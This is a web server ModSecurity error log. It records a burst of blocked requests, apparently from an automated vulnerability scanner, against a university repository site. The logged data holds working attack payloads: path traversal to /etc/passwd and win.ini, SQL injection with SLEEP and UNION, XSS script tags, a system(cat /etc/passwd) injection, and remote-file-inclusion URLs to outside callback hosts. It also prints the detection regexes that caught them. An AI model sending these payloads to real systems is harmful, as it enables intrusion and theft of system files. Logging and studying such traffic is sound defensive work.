[Tue Aug 29 11:40:59.360025 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gino46sr31rmpa.oast.site found within TX:1: cjmnbitjmimt14dgn26gino46sr31rmpa.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcsLCYAAAAE"]
[Tue Aug 29 11:40:59.408897 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAaZ9lQAAAAo"]
[Tue Aug 29 11:41:00.359904 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcoNN8AAAAF"]
[Tue Aug 29 11:41:00.381284 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcsLCsAAAAE"]
[Tue Aug 29 11:41:00.419402 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcoNOIAAAAF"]
[Tue Aug 29 11:41:01.546964 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAActbF0AAAAH"]
[Tue Aug 29 11:41:01.585660 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcsLDIAAAAE"]
[Tue Aug 29 11:41:01.590859 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbF8AAAAH"]
[Tue Aug 29 11:41:03.604408 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcuUmUAAAAI"]
[Tue Aug 29 11:41:03.644557 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAcYU8wAAAAp"]
[Tue Aug 29 11:41:04.403541 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcqJHcAAAAG"]
[Tue Aug 29 11:41:05.435411 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcvBe0AAAAJ"]
[Tue Aug 29 11:41:05.455665 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAYMWVMAAAAR"]
[Tue Aug 29 11:41:05.483203 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcuUnQAAAAI"]
[Tue Aug 29 11:41:05.552808 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAActbHsAAAAH"]
[Tue Aug 29 11:41:05.557268 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcvBfMAAAAJ"]
[Tue Aug 29 11:41:08.428417 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-UAAAAp"]
[Tue Aug 29 11:41:09.377211 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAYAAAAp"]
[Tue Aug 29 11:41:09.619203 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO125cCo-f0AAAc2dOwAAAAN"]
[Tue Aug 29 11:41:10.427678 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:email: 2UdyWmaXpTq91nUrOZ0geHP3XoU@test.com' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO125sCo-f0AAAc5SlAAAAAQ"]
[Tue Aug 29 11:41:10.488034 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:csftyp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:csftyp: classic ssfile1=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/broker"] [unique_id "ZO125sCo-f0AAAYf-OIAAAAD"]
[Tue Aug 29 11:41:13.370597 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:certfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:certfile: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/cert_download.php"] [unique_id "ZO126cCo-f0AAActbI0AAAAH"]
[Tue Aug 29 11:41:15.439917 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:previewFilePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:previewFilePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/analytics/saw.dll"] [unique_id "ZO1268Co-f0AAAaZ9pgAAAAo"]
[Tue Aug 29 11:41:18.709197 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -6' union select 1,md5('999999999'),3,4,5,6,7,8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO127sCo-f0AAAcqJL8AAAAG"]
[Tue Aug 29 11:41:19.349646 2023] [:error] [pid 1842] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO1278Co-f0AAAcyp3YAAAAK"]
[Tue Aug 29 11:41:19.382692 2023] [:error] [pid 1846] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO1278Co-f0AAAc2dQkAAAAN"]
[Tue Aug 29 11:41:19.387672 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:err: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO1278Co-f0AAAaZ9qoAAAAo"]
[Tue Aug 29 11:41:20.536845 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/register/toDownload.do"] [unique_id "ZO128MCo-f0AAAc0NdMAAAAM"]
[Tue Aug 29 11:41:20.618768 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://test found within TX:1: test"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/oauth/authorize"] [unique_id "ZO128MCo-f0AAAc4Em0AAAAP"]
[Tue Aug 29 11:41:20.650999 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO128MCo-f0AAAcqJMsAAAAG"]
[Tue Aug 29 11:41:20.690952 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:filename: ../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ACSServer/WebServlet"] [unique_id "ZO128MCo-f0AAAcqJM0AAAAG"]
